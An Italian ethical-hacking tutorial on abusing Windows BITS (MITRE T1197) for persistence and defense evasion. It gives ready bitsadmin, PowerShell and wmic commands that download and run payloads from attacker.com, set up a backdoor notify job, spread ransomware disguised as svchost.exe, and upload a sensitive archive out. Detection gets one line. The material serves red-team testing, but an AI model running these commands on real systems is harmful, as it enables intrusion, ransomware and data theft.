BITS Jobs Abusati: BITS Jobs (T1197)

Windows Background Intelligent Transfer Service (BITS) è un servizio nativo di Windows che gestisce trasferimenti asincroni di file a bassa banda, utilizzando la banda disponibile senza interferire con altre applicazioni di rete. Gli attaccanti sfruttano questa funzionalità legittima per scaricare payload maligni, eseguire codice e mantenere persistenza sui sistemi compromessi.

Questa tecnica si manifesta in due tattiche della kill chain: TA0003 (Persistence) dove gli attaccanti creano job BITS di lunga durata che sopravvivono ai riavvii del sistema, e TA0005 (Defense Evasion) poiché le operazioni BITS sono spesso considerate legittime dai firewall e dagli antivirus. L'abuso di BITS è documentato in 5 gruppi APT e 8 famiglie di malware, rendendola una tecnica particolarmente diffusa nel panorama delle minacce moderne.

La pericolosità deriva dalla natura stessa del servizio: i job BITS possono durare fino a 90 giorni per default, non creano nuovi file o modifiche al registro evidenti, e possono eseguire programmi arbitrari al completamento o in caso di errore.

Per testare la resilienza dei sistemi contro l'abuso di BITS, inizia creando un job di download base. Il comando più semplice utilizza BITSAdmin dalla riga di comando:

bitsadmin /transfer myDownloadJob /download /priority normal https://attacker.com/payload.exe C:\Users\Public\payload.exe

PowerShell offre controllo più granulare attraverso i cmdlet BITS. Puoi creare job persistenti che eseguono payload al completamento:

$job = Start-BitsTransfer -Source https://attacker.com/beacon.exe -Destination C:\ProgramData\update.exe -Asynchronous

La vera potenza sta nell'opzione SetNotifyCmdLine che permette l'esecuzione automatica. Con BITSAdmin puoi configurare un comando da eseguire quando il job termina:

bitsadmin /create backdoorJob bitsadmin /addfile backdoorJob https://legit-site.com/small.txt C:\Windows\Temp\done.txt bitsadmin /SetNotifyCmdLine backdoorJob C:\ProgramData\update.exe "" bitsadmin /resume backdoorJob

Per simulare la persistenza avanzata usata da APT41 e Wizard Spider, combina BITS con WMI. Questo approccio permette di distribuire ransomware su multiple macchine:

wmic /node:targetPC process call create "cmd /c bitsadmin /transfer pwn /download /priority high https://c2.attacker.com/ransomware.exe C:\Windows\Temp\svchost.exe & C:\Windows\Temp\svchost.exe"

Un test completo dovrebbe includere anche l'esfiltrazione dati. APT39 ha dimostrato come BITS possa caricare file verso server esterni:

bitsadmin /transfer exfilJob /upload /priority low C:\Users\Administrator\Documents\sensitive.zip https://attacker.com/upload.php

Per verificare la detection, monitora gli Event ID 59-61 nel log Microsoft-Windows-Bits-Client/Operational durante l'esecuzione dei comandi.

Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo